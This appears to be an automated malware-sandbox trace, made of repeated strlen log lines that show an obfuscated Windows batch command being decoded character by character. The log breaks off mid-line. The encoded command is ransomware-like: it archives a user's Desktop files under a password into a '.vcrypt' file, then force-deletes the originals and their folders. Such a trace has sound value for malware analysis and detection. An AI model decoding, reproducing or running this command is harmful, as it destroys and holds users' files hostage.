iru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" fru#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" fou#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for#2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for 2I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /I#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F#(l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F (l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %l#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i#lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.485] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i lq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i iq#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in#+*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in +*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in (*glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('glu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dlu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('diu#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir#2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir 2e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /e#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b#%(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b %(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"(XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%XVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%UVHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USHUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USEUSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERSURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPURILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPRRILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROILOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFLOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFIOH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILH(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE(_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%_Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Ghvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Dhvnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Devnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desnwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Deskwrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktrs_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.486] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktos_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop_-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\-1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist \"%USERPROFILE%\\Desktop\\\" for /F %i in ('dir /b \"%USERPROFILE%\\Desktop\\*1-%*,#gr#%(WHPS(_prgb341h{h%#d#0w:}#0u#0p{3#0sRh}igvh9i8hvi746v8ig7h9iVT78U757HGGH]V#%(XVHUSURILOH(_(xvhuqdph(bghvnwrs1yfu|sw%#%(XVHUSURILOH(_Ghvnwrs_-%#)#gho#2i#2v#2t#%(XVHUSURILOH(_Ghvnwrs_%#)#IRU#2G#(s#LQ#+%(XVHUSURILOH(_Ghvnwrs_-%,#gr#upglu#%(s%#2v#2t") returned 0x14f [0056.487] strlen (_Str="if exist 